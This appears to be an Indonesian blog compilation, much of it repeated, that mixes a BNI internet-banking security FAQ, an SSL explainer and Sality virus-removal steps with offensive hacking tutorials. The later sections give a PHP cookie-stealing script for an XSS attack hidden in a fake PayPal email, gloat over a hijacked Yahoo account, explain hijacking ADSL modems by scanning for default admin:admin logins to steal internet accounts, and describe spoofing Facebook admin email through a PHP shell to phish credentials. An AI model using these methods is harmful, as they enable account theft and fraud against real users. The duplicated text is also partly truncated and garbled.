Security yang di Terapkan BNI Internet Banking
BNI Internet Banking mempunyai sistem pengamanan sebagai berikut :
- Menggunakan sistem keamanan standar internasional dengan enskripsi SSL128 bit oleh Verisign. SSL 128 bit (Secure Socket Layer), yaitu lapisan pertama sistem pengamanan BNI Internet Banking yang lazim digunakan dalam dunia perbankan. Dengan menggunakan SSL ini, semua data yang dikirimkan dari server BNI Internet Banking ke komputer nasabah dan sebaliknya selalu melalui proses enkripsi (acak secara sistem) dengan menggunakan sandi 128-bit yang hanya diketahui oleh komputer nasabah dan server BNI Internet Banking. Dengan demikian, pihak-pihak lain tidak akan dapat mengartikan transmisi data tersebut apabila menerimanya.
- Pengamanan pintu akses BNI Internet Banking dengan firewall.
- Proses registrasi Layanan BNI Internet Banking dilakukan melalui BNI ATM menggunakan PIN BNI Card.
- Proses aktivasi melalui www.bni.co.id atau langsung ke https://ibank.bni.co.id menggunakan PIN registrasi dan nomor BNI Card yang digunakan untuk registrasi di BNI ATM.
- User ID dan Password dibuat oleh Pengguna saat aktivasi BNI Internet Banking, berupa kombinasi alphabet dan numeric (alphanumeric).
- Password BNI Internet Banking dapat diubah kapan saja oleh Pengguna BNI Internet Banking.
- Sistem BNI Internet Banking dilengkapi dengan session time out dimana akan otomatis Log Off.
- Alat tambahan untuk transaksi finansial menggunakan BNI e-Secure yang akan menghasilkan kombinasi angka yang berubah-ubah (dynamic PIN) setiap kali Pengguna melakukan transaksi.
- PIN BNI e-Secure dibuat oleh Pengguna dan digunakan setiap kali mengaktifkan/ menyalakan BNI e-Secure
- BNI e-Secure akan otomatis mati apabila tidak digunakan dalam waktu 45 (empat puluh lima) detik
- Pemblokiran layanan BNI Internet Banking dilakukan oleh Pengguna melalui permintaan kepada BNI PhonePlus melalui BNI Call.
- Limit transaksi finansial per hari dibatasi.
- Bukti transaksi BNI Internet Banking dapat dicetak dan atau disimpan sesuai keperluan pengguna.
Apa yang dapat saya lakukan untuk memaksimalkan keamanan layanan BNI Internet Banking?
- Buatlah User ID & Password BNI Internet Banking yang tidak mudah ditebak tetapi gampang diingat
- Rahasiakan Password BNI Internet Banking Anda dan jangan pernah memberitahukannya kepada orang lain
- Lakukan perubahan Password BNI Internet Banking secara berkala
- Jangan tinggalkan computer Anda saat Login ke layanan BNI Internet Banking dan selalu klik “logout” jika sudah selesai menggunakan
- Tolak layanan simpan otomatis User ID dan Password BNI Internet Banking pada saat browser menawarkan peyimpanan otomatis
- Jangan gunakan User ID atau Password atau Informasi pribadi lainnya ( Nomor rekening, Nomor Kartu ATM dan lain sebagainya) pada web-site yang tidak dikenal.
- Jika menggunakan koneksi dan alat nirkabel pastikan bahwa kemanannya cukup /memadai
- Biasakan untuk menghapus browser cache dan history setiap selesai bertransaksi
- Lindungi komputer anda dari virus dan program berbahaya lainnya
- Biasakan untuk melakukan check saldo rekening dan mutasi transaksi secara teratur
- Segera beritahukan kepada kami melalui BNI Call di 021 5789 9999 atau 68888 melalui ponsel Anda, jika mendapat masalah atau sesuatu yang mencurigakan
Apakah aman bertransaksi lewat warnet?
Kami tidak menyarankan anda untuk bertransaksi di komputer milik umum atau warnet. Umumnya komputer di tempat umum rentan terhadap virus dan program yang dapat me-record apa yang diketik atau “keylogger”. Bukan mustahil program tersebut sengaja dibuat untuk membaca apapun yang anda ketikkan (termasuk User ID dan Password BNI Internet Banking Anda), untuk kemudian diambil atau dikirimkan kepada sang pembuat program dan digunakan untuk mengambil manfaat. Tetapi jika sampai hal tersebut terjadi BNI Internet Banking tetap aman karena dilengkapi dengan BNI e-Secure, hal paling buruk yang terjadi adalah orang tersebut hanya dapat melihat saldo dan mutasi transaksi.
Bagaimana cara menghindari penipuan bermodus phishing
Apa itu phishing?
Phishing, adalah tindakan memperoleh informasi pribadi seperti User ID, Password, nomor rekening bank, nomor kartu ATM Anda secara tidak sah. Informasi ini kemudian akan dimanfaatkan oleh pihak penipu untuk mengakses rekening, melakukan penipuan kartu ATM atau memandu nasabah untuk melakukan transfer ke rekening tertentu dengan iming-iming hadiah.
Bagaimana Phishing dilakukan?
Teknik umum yang sering digunakan oleh penipu adalah sebagai berikut:
- Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan Nasabah sehingga Nasabah terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; bank atau penerbit kartu kredit. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit.
- Membuat situs palsu yang sama persis dengan situs resmi atau pelaku phishing mengirimkan e-mail yang berisikan link ke situs palsu tersebut.
- Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim
Bagaimana cara menghindari Phishing?
Jangan mudah terpancing untuk mengikuti arahan/petunjuk apapun sehubungan informasi rekening, yang dianjurkan pada e-mail yang dilink ke situs bank tertentu. Jika Anda menerima e-mail sejenis ini dan mengatasnamakan BNI, berhati-hatilah. BNI menerapkan kebijakan untuk tidak meminta pemilik rekening/Nasabah mengup-date data melalui sarana e-mail.
Jika Anda menerima e-mail seperti ini, segera laporkan kepada pihak BNI
Langkah-langkah apa yang harus dilakukan untuk memproteksi diri dari penipuan Phishing?
Berikut langkah memproteksi diri dari penipuan bermodus phishing:
- Selalu ketikan URL yang lengkap untuk alamat situs / web-site resmi bank, yaitu: www.bni.co.id pada menu bar di browser Anda
- Jangan pernah membagi atau memberikan User ID atau Password BNI Internet Banking Anda pada orang lain bahkan staf BNI sekalipun. BNI tidak pernah menanyakan Password BNI Internet Banking untuk alasan apapun
- Jika Anda mendapatkan e-mail yang berisi pemberitahuan bahwa BNI akan menutup rekening atau User ID Anda, jika tidak melakukan konfirmasi dengan data-data pribadi, jangan reply atau mengklik link yang ada pada e-mail tersebut
- Jangan terpancing untuk mengikuti anjuran melakukan transfer ke rekening tertentu, dengan tujuan mendapatkan hadiah undian
Perlukah melaporkan lokasi phishing atau e-mail yang mencurigakan?
Jika Anda memiliki pertanyaan tentang e-mail yang dikirimkan oleh BNI atau bila Anda merasa bahwa seseorang sedang mencoba melakukan penyalahgunaan atas nama BNI, segera hubungi BNI Call melalui 021 5789 9999 atau 68888 melalui ponsel Anda untuk melakukan konfirmasi
SSL (Secure Socket Layer)
SSL (Secure Socket Layer) adalah salah satu metode enkripsi dalam komunikasi data yang dibuat oleh Netscape Communication Corporation.
SSL merupakan sebuah protokol berlapis. Dalam tiap lapisannya sebuah data terdiri dari panjang, deskripsi dan isi. SSL mengambil data untuk dikirimkan, dipecahkan kedalam blok-blok yang teratur, kemudian dikompres jika perlu, menerapkan MAC, dienkripsi, dan hasilnya dikirimkan. Di tempat tujuan, data didekripsi, verifikasi, dekompres, dan disusun kembali. Hasilnya dikirimkan ke klien di atasnya. Terjemahan dari SSL Protocol Internet Draft (The SSL Protocol, Version 3.0 oleh ALAN O. FREIER dan PAUL C. KOCHER, dapat Anda buka di http://home.netscape.com/eng/ssl3/ssl-toc.html.
SSL hanya mengenkripsikan data yang dikirim lewat http. Aturan SSL di disain untuk melakukan:
1. Encryption, untuk mengatasi eavesdropping
2. Data integrity, untuk mengatasi manipulation
3. Authentication, untuk mengatasi impersonation
Bagaimana SSL berjalan dapat digambarkan sebagai berikut :
SSL hanya mengenkripsikan data yang dikirim lewat http. Aturan SSL di disain untuk melakukan:
1. Encryption, untuk mengatasi eavesdropping
2. Data integrity, untuk mengatasi manipulation
3. Authentication, untuk mengatasi impersonation
Bagaimana SSL berjalan dapat digambarkan sebagai berikut :
- Pada saat koneksi mulai berjalan, klien dan server membuat dan mempertukarkan kunci rahasia, yang dipergunakan untuk mengenkripsi data yang akan dikomunikasikan. Meskipun sesi antara klien dan server diintip pihak lain, namun data yang terlihat sulit untuk dibaca karena sudah dienkripsi.
- SSL mendukung kriptografi public key, sehingga server dapat melakukan autentikasi dengan metode yang sudah dikenal umum seperti RSA dan Digital Signature Standard (DSS).
- SSL dapat melakukan verifikasi integritas sesi yang sedang berjalan dengan menggunakan algoritma digest seperti MD5 dan SHA. Hal ini menghindarkan pembajakan suatu sesi.
Perlu dipahami bahwa SSL hanya akan memproteksi data kita pada saat transmisi saja. Hal ini yang disebut network security. Protokol SSL sama sekali tidak akan memproteksi data - sebelum maupun sesudah dilakukan komunikasi. Artinya kita harus percaya penuh bahwa penjual / merchant tidak memberikan nomor kartu kredit yang kita miliki ke orang lain pada bisnis online.
Oleh karena itu, banyak perusahaan E-commerce dan Banking yang sudah menggunakan SSL 128 bit untuk menjaga keamanan websitenya yang artinya akan membutuhkan waktu kira-kira 12.710.204.652.610.000.000.000.000 tahun untuk membobol informasi yang di enkripsi menggunakan RC4 yang dipakai di SSL, lumayan lama kan..
Walaupun informasi yang di enkripsi oleh SSL 128 bit sudah cukup sulit untuk bisa dibobol bukan berarti informasi tersebut akan selamanya aman dari para penjahat cyber dan tidak selamanya SSL akan melindungi informasi dari beberapa hal, misal :
* Denial of Services
* Buffer overflow
* Man-in-the-middle attack
* Cross scripting attack
Dan masih ada kemungkinan bahwa di SSL masih terdapat banyak celah keamanan yang bisa dilakukan dengan beberapa teknik.
Oleh karena itu, banyak perusahaan E-commerce dan Banking yang sudah menggunakan SSL 128 bit untuk menjaga keamanan websitenya yang artinya akan membutuhkan waktu kira-kira 12.710.204.652.610.000.000.000.000 tahun untuk membobol informasi yang di enkripsi menggunakan RC4 yang dipakai di SSL, lumayan lama kan..
Walaupun informasi yang di enkripsi oleh SSL 128 bit sudah cukup sulit untuk bisa dibobol bukan berarti informasi tersebut akan selamanya aman dari para penjahat cyber dan tidak selamanya SSL akan melindungi informasi dari beberapa hal, misal :
* Denial of Services
* Buffer overflow
* Man-in-the-middle attack
* Cross scripting attack
Dan masih ada kemungkinan bahwa di SSL masih terdapat banyak celah keamanan yang bisa dilakukan dengan beberapa teknik.
About Salitiy
Virus “Salitiy”
virus yang udah pernah tenar pada tahun 2003 kini kembali muncul dengan aksi yang lebih
“Berbahaya “….dari sebelumnya
virus ini dimasukkan kedalam kategory parasit abiz………..karena sasarannya file yang berekstensi exe……..
Salitiy menginfeksi setiap file yang berekstensi exe…………j Wal hasil ukuran file asli membengkak menjadi sekitar
20KB. Bagusnya lagi Salitiy meletakkan source code nya pada empty
segmen pada file yang ditumpangi dan mengubah entry poit asli ke bagun
awal tubunya sehingga yang pertama kali dijalankan adalah source code
palsu dan terkadang membuat file induk menjadi korup. PAda umunya file
induk langsung menutup diri sesaat dijalankan.
enyebarannya bisa dibilang “unik” karena setelah menginfeksi suatu
file EXE (PE), maka file yang baru terinfeksi tersebut yang akan
meneruskan aksi virusnya dan begitu seterusnya akanmencari korban
lainnya. Pada saat file yang terinfeksi di-kill, bukan mati aksinya
tapi diambil alih oleh predecessor- nya.
Untuk itu ada cara yang aman untuk menghilangkan virus ini tanpa mendelete langsung, dan saya sarankan (berdasarkan pengalaman) menggunakan cara ini:
1. download rmsality, virus removal khusus untuk virus sality dari Grisoft (produsen AVG), berisi tiga file yang harus anda dowload ke dalam satu folder http://free.grisoft.com/ww.virus-removal.ndi-67769
2. download fileASSASSIN http://www.malwarebytes.org/fa-setup.exe
===============================================
Langkah-langkah CARA NGATASINNYA...!!
1. Installkan dan jalankan fileASSASSIN dan arahkan / ketik di menu browsenya ke c:\windows\system32\wmdrtc32.dll delete file-nya di cheklist kemudian klik execute. ulangi untuk file yang kedua c:\windows\system32\wmdrtc32.dl_
2. jalankan program rmsality yang sudah di download dan biarkan melakukan proses scanning secara keseluruhan. setelah selesai anda akan mendapatkan beberapa file yang tidak bisa di clean (failed to clean) dan antivirus meminta anda untuk mereboot system. (anda juga bisa melakukan scanning per-drive dengan cara masuk ke menu run, kemudian ketik cmd, kemudian masuk ke direktori rmsality dimana anda menyimpannya, kemudian ketik contoh: rmsality c:
3. reboot system. untuk meyakinkan silahkan scan lagi dengan antivirus yang lain, seperti ANSAV, AVG dll
virus yang udah pernah tenar pada tahun 2003 kini kembali muncul dengan aksi yang lebih
“Berbahaya “….dari sebelumnya
virus ini dimasukkan kedalam kategory parasit abiz………..karena sasarannya file yang berekstensi exe……..
Salitiy menginfeksi setiap file yang berekstensi exe…………j Wal hasil ukuran file asli membengkak menjadi sekitar
20KB. Bagusnya lagi Salitiy meletakkan source code nya pada empty
segmen pada file yang ditumpangi dan mengubah entry poit asli ke bagun
awal tubunya sehingga yang pertama kali dijalankan adalah source code
palsu dan terkadang membuat file induk menjadi korup. PAda umunya file
induk langsung menutup diri sesaat dijalankan.
enyebarannya bisa dibilang “unik” karena setelah menginfeksi suatu
file EXE (PE), maka file yang baru terinfeksi tersebut yang akan
meneruskan aksi virusnya dan begitu seterusnya akanmencari korban
lainnya. Pada saat file yang terinfeksi di-kill, bukan mati aksinya
tapi diambil alih oleh predecessor- nya.
Untuk itu ada cara yang aman untuk menghilangkan virus ini tanpa mendelete langsung, dan saya sarankan (berdasarkan pengalaman) menggunakan cara ini:
1. download rmsality, virus removal khusus untuk virus sality dari Grisoft (produsen AVG), berisi tiga file yang harus anda dowload ke dalam satu folder http://free.grisoft.com/ww.virus-removal.ndi-67769
2. download fileASSASSIN http://www.malwarebytes.org/fa-setup.exe
===============================================
Langkah-langkah CARA NGATASINNYA...!!
1. Installkan dan jalankan fileASSASSIN dan arahkan / ketik di menu browsenya ke c:\windows\system32\wmdrtc32.dll delete file-nya di cheklist kemudian klik execute. ulangi untuk file yang kedua c:\windows\system32\wmdrtc32.dl_
2. jalankan program rmsality yang sudah di download dan biarkan melakukan proses scanning secara keseluruhan. setelah selesai anda akan mendapatkan beberapa file yang tidak bisa di clean (failed to clean) dan antivirus meminta anda untuk mereboot system. (anda juga bisa melakukan scanning per-drive dengan cara masuk ke menu run, kemudian ketik cmd, kemudian masuk ke direktori rmsality dimana anda menyimpannya, kemudian ketik contoh: rmsality c:
3. reboot system. untuk meyakinkan silahkan scan lagi dengan antivirus yang lain, seperti ANSAV, AVG dll
Yahoo Hacking
Seperti yang telah kita ketahui .. XSS merupakan salah sebuah jenis serangan yang paling berbahaya dalam dunia
berinternet dan hacking .. Akan tetapi, percayakah anda bahwa jenis serangan inipun kerapkali menyerang berbagai
perusahaan raksasa seperti hotmail bahkan yahoo?? Dalam video ini kita akan sedikit bahas mengenai yahoo yang
terkena jenis serangan sejenis ini ..
Tidak percaya?! Mari kita buktikan :D
Pertama tama anda membutuhkan script ini:
User required to use Internet Explorer to view this file.html>
Yang kemudian perlu anda masukan kedalam file *.html
dan kemudian perlu anda attach dalam sebuah email .. :D
Selain itu andapun memerlukan file *.php yang berisikan script ini:
$cookie = $_GET['id'];
$cook = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, '
idu lu ala: ' .$cookie. 'Cookie: '.$cook.'
IP: ' .$ip. '
Referer: '.$referer.'
');
fclose($fp);
?>
Jangan lupa juga untuk menghostingkannya dalam hosting yang bisa accpet PHP..
Selain itu juga jgn lupa untuk membuat file cookies.txt dalam directory yang sama dengan script ini ..
Setelah memiliki script .php tadi dan setelah menghostingkannya dalam hosting server yang layak ..
Sekarang yang kita perlukan adalah mengirimkan scirpt pertama secara attachment ke email korban ..
Untuk membuat korban tidak curiga .. Ada baiknya script tersebut disisipkan dalam HTML code lain :D
Dalam kasus ini saya menggunakan Paypal Letters :D
Now .. WHen ur victim membuka email mereka dengan menggunakan Internet Explorer ..
Mereka akan mendapatkan email tersebut hanya sebagai notifikasi letters dari Paypal ..
Berikut contohnya :D
Yay !!!
Paypal letters!!!
But.. Is that all ?? :D
OWNED!!!!
Hahaha
U've got the Cookies !!!
Nice, huh?! :D
Sekarang bagaimana kita memanfaatkan cookie tersebut?!
Mudah saja .. Yang anda perlukan adalah Y dan T .. :D
Berikut adalah contoh yang akan saya lakukan menggunakan account orang philliphine yang kena tipu muslihat paypal xD
woops!!
My bad ..
My victim changed his Pass already ;D
Coba kita gunakan pass pribadi :D
Logged in after logout .. And its WITHOUT PASSWORD !!!
Hehehehe
OWNED !!!
Well .. Mohon maaf karena tadi contoh yang saya berikan sudah mengganti password nya ..
I've got some more .. Tapi gak isa dipercobakan 1 per 1 :D
Yay!!!
Hhahaha
berinternet dan hacking .. Akan tetapi, percayakah anda bahwa jenis serangan inipun kerapkali menyerang berbagai
perusahaan raksasa seperti hotmail bahkan yahoo?? Dalam video ini kita akan sedikit bahas mengenai yahoo yang
terkena jenis serangan sejenis ini ..
Tidak percaya?! Mari kita buktikan :D
Pertama tama anda membutuhkan script ini:
User required to use Internet Explorer to view this file.
Yang kemudian perlu anda masukan kedalam file *.html
dan kemudian perlu anda attach dalam sebuah email .. :D
Selain itu andapun memerlukan file *.php yang berisikan script ini:
$cookie = $_GET['id'];
$cook = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, '
idu lu ala: ' .$cookie. 'Cookie: '.$cook.'
IP: ' .$ip. '
Referer: '.$referer.'
')
fclose($fp);
?>
Jangan lupa juga untuk menghostingkannya dalam hosting yang bisa accpet PHP..
Selain itu juga jgn lupa untuk membuat file cookies.txt dalam directory yang sama dengan script ini ..
Setelah memiliki script .php tadi dan setelah menghostingkannya dalam hosting server yang layak ..
Sekarang yang kita perlukan adalah mengirimkan scirpt pertama secara attachment ke email korban ..
Untuk membuat korban tidak curiga .. Ada baiknya script tersebut disisipkan dalam HTML code lain :D
Dalam kasus ini saya menggunakan Paypal Letters :D
Now .. WHen ur victim membuka email mereka dengan menggunakan Internet Explorer ..
Mereka akan mendapatkan email tersebut hanya sebagai notifikasi letters dari Paypal ..
Berikut contohnya :D
Yay !!!
Paypal letters!!!
But.. Is that all ?? :D
OWNED!!!!
Hahaha
U've got the Cookies !!!
Nice, huh?! :D
Sekarang bagaimana kita memanfaatkan cookie tersebut?!
Mudah saja .. Yang anda perlukan adalah Y dan T .. :D
Berikut adalah contoh yang akan saya lakukan menggunakan account orang philliphine yang kena tipu muslihat paypal xD
woops!!
My bad ..
My victim changed his Pass already ;D
Coba kita gunakan pass pribadi :D
Logged in after logout .. And its WITHOUT PASSWORD !!!
Hehehehe
OWNED !!!
Well .. Mohon maaf karena tadi contoh yang saya berikan sudah mengganti password nya ..
I've got some more .. Tapi gak isa dipercobakan 1 per 1 :D
Yay!!!
Hhahaha
Hacking Modem ADSL dan Account Speedy
Ehm,, numpang post lagi nee,,
sebenarnya saya sangat malu menggunakan kata "hack" di
atas, maklum sebagai seorang newbie saya belum pantas menggunakan
kata tersebut,, apalagi taknik yang akan dituliskan ini
hanya merupakan cara yang cukup sederhana dan sudah banyak di pasaran
tapi karena mungkin masih ada yang belum tau jadi izeng² saya posting aja.. hehe..
ehm.. sebelumnya yang sudah merasa master sangat disarankan untuk berhenti membaca tulisan ini..
jadi langsung saja...
logikanya sepert ini ;
- Mecari target
- Mencoba login ke Modemnya
- Lock The Target
Sekedar cerita, saya pernah berkenjung ke warnet teman saya
setelah bosan maen games (skill saya cuma bisa maen game.. hiz..hikz..),
tanpa sengaja http://my-ip.info terbuka dengan sendirinya,
http://img187.imageshack.us/img187/180/82089312.jpg
trus iseng² saya memasukkan IP saya pada browser.. dan browser langsung
memunculkan menu pop-up untuk meminta username n passwd dari modem yang digunakan..
http://img7.imageshack.us/img7/5558/50068153.jpg
kemudian saya memasukkan default username dan passwd modem ADSL
yaitu admin:admin dan bummmmmmm..!!!! Berhasil masuk ke dalam system modem tersebut..
http://img7.imageshack.us/img7/6600/97887189.jpg
Kalian bisa mendapatkan hasil yang lebih besar dengan melakukan scanning IP range dari 1-255 dari IP yang kalian temukan.
http://img20.imageshack.us/img20/7825/52878992.jpg
http://img20.imageshack.us/img20/2962/24774598.jpg
Untuk mendapatkan IP dari account speedy, kebanyakan bisa ditemukan di IRC, dengan join ke channel² yang ramai dikunjungi dan
melakukan /who #namachannnel pada status server (seperti dalnet)
http://img20.imageshack.us/img20/3293/15787255.jpg
http://img205.imageshack.us/img205/6918/91341146.jpg
or bisa menggunakan sedikit SocEng pada user² dalam channel kemudian
melakukan /whois nick untuk mendapatkan IPnya, itu juga untuk memastikan bahwa target kita bukan sebuah bot.
Yang pasti intinya yaitu mencoba masuk pada modem ADSL target dengan memanfaatkan pemahaman kita tentang username n passwd modem ADSL,, dan apabila berhasil login dan masuk pada system modem tersebut, kita bisa melakukan apa saja terhadap korban mulai dari memblock URL sampai pencurian account speedy (hehe.. Inet gratis dund)
tergantung kekreatifan kalian.. ^_^ (
sebenarnya saya sangat malu menggunakan kata "hack" di
atas, maklum sebagai seorang newbie saya belum pantas menggunakan
kata tersebut,, apalagi taknik yang akan dituliskan ini
hanya merupakan cara yang cukup sederhana dan sudah banyak di pasaran
tapi karena mungkin masih ada yang belum tau jadi izeng² saya posting aja.. hehe..
ehm.. sebelumnya yang sudah merasa master sangat disarankan untuk berhenti membaca tulisan ini..
jadi langsung saja...
logikanya sepert ini ;
- Mecari target
- Mencoba login ke Modemnya
- Lock The Target
Sekedar cerita, saya pernah berkenjung ke warnet teman saya
setelah bosan maen games (skill saya cuma bisa maen game.. hiz..hikz..),
tanpa sengaja http://my-ip.info terbuka dengan sendirinya,
http://img187.imageshack.u
trus iseng² saya memasukkan IP saya pada browser.. dan browser langsung
memunculkan menu pop-up untuk meminta username n passwd dari modem yang digunakan..
http://img7.imageshack.us/
kemudian saya memasukkan default username dan passwd modem ADSL
yaitu admin:admin dan bummmmmmm..!!!! Berhasil masuk ke dalam system modem tersebut..
http://img7.imageshack.us/
Kalian bisa mendapatkan hasil yang lebih besar dengan melakukan scanning IP range dari 1-255 dari IP yang kalian temukan.
http://img20.imageshack.us
http://img20.imageshack.us
Untuk mendapatkan IP dari account speedy, kebanyakan bisa ditemukan di IRC, dengan join ke channel² yang ramai dikunjungi dan
melakukan /who #namachannnel pada status server (seperti dalnet)
http://img20.imageshack.us
http://img205.imageshack.u
or bisa menggunakan sedikit SocEng pada user² dalam channel kemudian
melakukan /whois nick untuk mendapatkan IPnya, itu juga untuk memastikan bahwa target kita bukan sebuah bot.
Yang pasti intinya yaitu mencoba masuk pada modem ADSL target dengan memanfaatkan pemahaman kita tentang username n passwd modem ADSL,, dan apabila berhasil login dan masuk pada system modem tersebut, kita bisa melakukan apa saja terhadap korban mulai dari memblock URL sampai pencurian account speedy (hehe.. Inet gratis dund)
tergantung kekreatifan kalian.. ^_^ (
Hack Facebook
Nah di topik perdana ini akan saya tulis secara lebih rinci tentang teknik Phishing
(teknik phishing adalah teknik yang digunakan untuk meminta agar calon korban memberikan data accountnya)
dengan memadukan 2 teknik,yaitu
1. Social Engineering,
2. Manipulasi Link,
Cara yg pertama di gunakan untuk melakukan pendekatan secara mental ke si Target dengan cara apapun.karena kita ada di dunia electronik maka kita juga harus menggunakan pendekatan secara elektronik..
ya itu dengan cara yg paling simple,,yaitu mengirimkan e-mail ( bukan amel ya ) ke korban untuk meminta secara langsung account si target,tp ap mungkin?
----------------
jangan patah semangat dulu,cari gorengan ato cemilan dulu, segelas energen, ato foto pacar bwt tambah semangat..
nah kl udah sekrang waktunya untuk Taking Action..
agar si Target mau memberikan Accoutnya maka paling tidak kita harus bs meggunakan cloaking,atau teknik menyamar..
kita kirim e-mail ke korban dengan menggatas nama kan admin@facebook.com
tp bagaimana caranya?...xixix
inget bwt yg master tinggalin aj ya ini topik...
kita bikin PHP MAILER dr sini kita bs mengirim e mail atas nama siapa saja yg kita ingin kan...dan bahkan atas nama admin@facebook.com
cara bikinya mudah kok,
1. cari PHP SHELL, bs beli ato minta aj ke para master, inget PHP SHELL ya..
trus tinggal bikin PHP MAILER nya..untuk Scripnya sudah ak sediakan
di sini https://www.thinkfasttoys.com/images/M/mailer.txt
ubah mailer.txt menjadi mailer.php
nah sudah dech, tinggal isi kolom alamat e-mail target, isi, dari dan sub tentunya, kl bs yg isinya kita minta untuk mengirimkan account dy ke alamt e-mail kita..
setelh itu semua jadi, tingal cari taget dech...
untuk demostrasi,..
(teknik phishing adalah teknik yang digunakan untuk meminta agar calon korban memberikan data accountnya)
dengan memadukan 2 teknik,yaitu
1. Social Engineering,
2. Manipulasi Link,
Cara yg pertama di gunakan untuk melakukan pendekatan secara mental ke si Target dengan cara apapun.karena kita ada di dunia electronik maka kita juga harus menggunakan pendekatan secara elektronik..
ya itu dengan cara yg paling simple,,yaitu mengirimkan e-mail ( bukan amel ya ) ke korban untuk meminta secara langsung account si target,tp ap mungkin?
----------------
jangan patah semangat dulu,cari gorengan ato cemilan dulu, segelas energen, ato foto pacar bwt tambah semangat..
nah kl udah sekrang waktunya untuk Taking Action..
agar si Target mau memberikan Accoutnya maka paling tidak kita harus bs meggunakan cloaking,atau teknik menyamar..
kita kirim e-mail ke korban dengan menggatas nama kan admin@facebook.com
tp bagaimana caranya?...xixix
inget bwt yg master tinggalin aj ya ini topik...
kita bikin PHP MAILER dr sini kita bs mengirim e mail atas nama siapa saja yg kita ingin kan...dan bahkan atas nama admin@facebook.com
cara bikinya mudah kok,
1. cari PHP SHELL, bs beli ato minta aj ke para master, inget PHP SHELL ya..
trus tinggal bikin PHP MAILER nya..untuk Scripnya sudah ak sediakan
di sini https://www.thinkfasttoys.
ubah mailer.txt menjadi mailer.php
nah sudah dech, tinggal isi kolom alamat e-mail target, isi, dari dan sub tentunya, kl bs yg isinya kita minta untuk mengirimkan account dy ke alamt e-mail kita..
setelh itu semua jadi, tingal cari taget dech...
untuk demostrasi,..
